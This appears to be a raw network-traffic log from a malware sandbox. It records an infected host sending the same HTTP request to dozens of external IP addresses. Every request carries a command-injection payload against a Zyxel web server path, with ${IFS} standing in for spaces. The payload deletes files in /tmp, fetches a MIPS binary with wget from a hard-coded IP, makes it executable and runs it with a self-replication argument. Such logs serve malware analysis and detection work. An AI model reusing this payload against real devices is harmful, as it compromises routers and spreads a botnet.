                                        Jan 14, 2024 16:18:54.686851025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6999192.168.2.1356834163.215.249.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686903000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7000192.168.2.1360072100.168.24.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686954021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7001192.168.2.1350970125.126.134.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686994076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7002192.168.2.1341618210.4.109.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687047958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7003192.168.2.134907062.45.65.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687102079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7004192.168.2.1347028179.49.184.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687156916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7005192.168.2.134635020.16.45.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687195063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7006192.168.2.13528542.212.117.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687222958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7007192.168.2.1340980141.200.171.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687268019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7008192.168.2.133457670.61.102.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687309027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7009192.168.2.134449651.255.38.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687349081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7010192.168.2.1344538108.205.89.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687391043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7011192.168.2.1359538164.75.69.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687449932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7012192.168.2.1359696123.145.209.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687495947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7013192.168.2.1347388131.123.135.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687516928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7014192.168.2.13562062.44.154.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687552929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7015192.168.2.1338176193.222.64.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687603951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7016192.168.2.1351948119.163.17.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687633038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7017192.168.2.1342106195.104.91.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687674999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7018192.168.2.1348036109.84.137.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687726974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7019192.168.2.1359970144.169.245.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687774897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7020192.168.2.13465784.205.1.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687817097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7021192.168.2.134227660.109.118.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687853098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7022192.168.2.134983441.227.191.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687880039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7023192.168.2.135222682.142.226.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687916040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7024192.168.2.1338928128.205.224.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687944889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7025192.168.2.1354150119.188.0.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.687982082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7026192.168.2.13557489.42.231.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688014984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7027192.168.2.135765267.154.78.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688061953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7028192.168.2.135296078.94.105.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688106060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7029192.168.2.1349842185.247.114.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688143969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7030192.168.2.1336580136.230.54.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688211918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7031192.168.2.133297852.188.247.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688277960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7032192.168.2.1341554133.66.108.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688294888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7033192.168.2.135728471.108.175.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688343048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7034192.168.2.133994461.66.67.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688385010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7035192.168.2.1336878163.187.68.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688420057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7036192.168.2.1347260199.233.176.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688467979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7037192.168.2.1337486209.166.77.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688489914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7038192.168.2.1360660188.149.51.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688515902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7039192.168.2.135342271.174.175.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688584089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7040192.168.2.135756441.252.139.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688605070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7041192.168.2.1339180199.252.145.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688653946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7042192.168.2.1346346145.224.129.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688673019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7043192.168.2.1345364186.8.203.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688720942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7044192.168.2.133335492.199.20.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688762903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7045192.168.2.1349634191.77.209.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688791990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7046192.168.2.133999037.165.7.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688844919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7047192.168.2.1343728194.44.20.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688909054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7048192.168.2.1337806116.93.215.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688942909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7049192.168.2.1357298175.253.46.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.688971996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7050192.168.2.1360686160.108.137.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689006090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7051192.168.2.135078642.17.70.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689063072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7052192.168.2.1359560159.162.150.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689085960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7053192.168.2.1360032190.146.167.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689117908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7054192.168.2.1340532123.163.149.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689167023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7055192.168.2.136094640.189.114.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689193010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7056192.168.2.1340236104.32.205.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689244032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7057192.168.2.1339484165.118.28.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689270973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7058192.168.2.1358728111.62.196.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689316988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7059192.168.2.1338354206.24.114.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689343929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7060192.168.2.1359408100.227.78.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689407110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7061192.168.2.1334460201.114.193.229443
                                        TimestampBytes transferredDirectionData
